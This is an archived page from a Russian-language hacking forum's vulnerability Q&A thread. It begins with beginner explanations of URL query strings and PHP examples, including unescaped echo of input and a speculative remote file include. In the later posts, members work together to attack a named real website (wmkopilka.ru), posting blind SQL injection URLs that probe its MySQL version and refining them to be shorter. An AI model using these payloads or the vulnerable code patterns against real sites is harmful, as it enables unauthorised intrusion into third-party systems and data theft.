FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 980 из 2422

980

Опции темы

Поиск в этой теме

Опции просмотра

09.11.2009, 00:24

Ins3t

Участник форума

Регистрация: 18.07.2009

Сообщений: 272

Провел на форуме:
2083691

Репутация: 330

Цитата:

Сообщение от B1t.exe

у меня один ламерский вопрос:
где можно читать что значат спецсимволы в ссылках(запросах) ?
ну вот например вопросительный знак (?) - что это значит и зачем ставится в ссылках?
узал поиск, но кроме query string ничего не нашел..
например:
http://yandex.ru/yandsearch?text=query+string&lr

Почитай о GET запросах.

08.11.2009, 23:51

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

Провел на форуме:
4761503

Репутация: 229

Цитата:

http://yandex.ru/yandsearch?text=query+string&lr

Этот знак ставится в GET запросе чтобы передать что либо к примеру PHP скрипту
К примеру

Код:

<?php
 if (isset($_GET['kto_ya'])){
 echo "Привет ".$_GET['kto_ya']."!!!";
}
?>

(писал тут сразу)

И при заходе на site.ru/nash_script.php?kto_ya=vasyan

Будет выведенно

Привет vasyan!!!

Последний раз редактировалось wolmer; 09.11.2009 в 16:15..

09.11.2009, 01:04

B1t.exe

Постоянный

Регистрация: 06.11.2006

Сообщений: 865

Провел на форуме:
1977708

Репутация: 208

ок. понял, спасибо народ.
? - он может передавать только php скрипты? хотя видел на сайтах ***.asp? .. и можно понять что передает все параметры, где используется GET метод передачи.
а в режиме POST не используется ?

Кстати, как можно узнать на сайте какиекомпоненты используется?
есть один сайт (не простой), но никак немогу узнать что там крутиться. все ссылки типа:
www.site.ru/?q=node/(*) , где * - это цифры от 1 до 12 (по страницам.)
например адрес раздела техподдержки вот такой: http://www.site.ru/?q=node/6

09.11.2009, 02:28

Ins3t

Участник форума

Регистрация: 18.07.2009

Сообщений: 272

Провел на форуме:
2083691

Репутация: 330

Цитата:

Сообщение от B1t.exe

Кстати, как можно узнать на сайте какиекомпоненты используется?
есть один сайт (не простой), но никак немогу узнать что там крутиться. все ссылки типа:
www.site.ru/?q=node/(*) , где * - это цифры от 1 до 12 (по страницам.)
например адрес раздела техподдержки вот такой: http://www.site.ru/?q=node/6

GET, при пост запросах урл не меняется.
node - дириктория.
И стоуктура очень похожа на друпаловскую (движкa drupal)

Последний раз редактировалось Ins3t; 09.11.2009 в 02:34..

09.11.2009, 16:21

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

Провел на форуме:
4761503

Репутация: 229

Цитата:

Сообщение от B1t.exe

ок. понял, спасибо народ.
? - он может передавать только php скрипты?

И не токо PHP скриптам (к примеру страницам aspx)

Цитата:

Что значит компоненты? Ну если в двиге исп. "компоненты" то смотря какой двиг

Код:

http://www.site.ru/?q=node/6

Может быть такой код... (но наврятли

)

Код:

<?php
 if (isset($_GET['q'])){
 include("http://www.site.ru/?q=".$_GET['q'].".php");
}
?>

09.11.2009, 16:41

gromoza

Новичок

Регистрация: 21.12.2008

Сообщений: 24

Провел на форуме:
485675

Репутация: 10

Всем привет.
Xttp://www.wmkopilka.ru/coinbox.php?5240'
Кто что скажет? Два дня пытался крутить результата ноль

09.11.2009, 17:17

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

Есть =)

http://wmkopilka.ru/coinbox.php?5240'/**/and/**/substring((select/**/version()),1,1)=5/**/and/**/'1'='1

09.11.2009, 17:31

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

2 ElteRUS:

молоток, только можно и без select:

Цитата:

http://wmkopilka.ru/coinbox.php?5240'/**/and/**/substring(version(),1,1)=5/**/and/**/'1'='1

09.11.2009, 17:43

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Цитата:

Сообщение от Pashkela

2 ElteRUS:

молоток, только можно и без select:

А можно вообще без substring, т.к. мускуль конвертирует типы данных.

Код:

http://wmkopilka.ru/coinbox.php?5240'/**/and/**/version()=5/**/and/**/'1'='1

#10

09.11.2009, 19:25

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Цитата:

Сообщение от l1ght

sorry за оффтоп, кто короче?

http://wmkopilka.ru/coinbox.php?5'*version()/'5

Умно

5*5/5

Страница 980 из 2422

980

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ